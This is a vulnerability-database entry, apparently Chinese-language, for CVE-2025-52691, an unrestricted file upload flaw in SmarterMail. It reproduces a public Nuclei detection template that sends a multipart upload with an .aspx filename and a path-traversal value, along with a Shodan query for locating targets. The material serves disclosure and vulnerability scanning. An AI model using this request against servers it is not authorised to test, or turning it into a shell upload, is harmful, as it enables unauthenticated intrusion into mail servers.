CVE-2025-52691: SmarterMail - Unrestricted File Upload

日期: 2026-01-09 | 影响软件: SmarterMail | POC: 已公开

漏洞描述

Mail server contains an unrestricted file upload vulnerability allowing unauthenticated attackers to upload arbitrary files to any location, potentially enabling remote code execution.

PoC代码[已公开]

id: CVE-2025-52691

info:
  name: SmarterMail - Unrestricted File Upload
  author: DhiyaneshDK,watchTowr
  severity: critical
  description: |
    Mail server contains an unrestricted file upload vulnerability allowing unauthenticated attackers to upload arbitrary files to any location, potentially enabling remote code execution.
  impact: |
    Unauthenticated attackers can upload arbitrary files, potentially leading to remote code execution and full server compromise.
  remediation: |
    Update to the latest version of the mail server.
  reference:
    - https://github.com/watchtowrlabs/watchTowr-vs-SmarterMail-CVE-2025-52691
    - https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-124/
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"SmarterMail"
  tags: cve,cve2025,smartermail,file-upload,intrusive,rce

variables:
  rand_string: '{{to_lower(rand_text_alpha(6))}}'
  file_name: '{{to_lower(rand_text_alpha(6))}}'

http:
  - raw:
      - |
        POST /api/upload HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW

        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="context"

        attachment
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="resumableIdentifier"

        fakeID
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="resumableFilename"

        {{file_name}}.aspx
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="contextData"

        {"guid":"dag/../../{{rand_string}}"}
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="whatever"; filename="{{file_name}}.jpg"

        Detection Artifact Generator
        ------WebKitFormBoundary7MA4YWxkTrZu0gW--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"fileName":'
          - '{"key":'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022009ff7129e92b0a9f83ff9eacf0f4a19cb7239dcb938444a1f6430738f91b738202206763eb41fb516cf003cc9a0b1e4dfe7089c466759459802eaad2d9209a318312:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-52691.yaml

相关漏洞推荐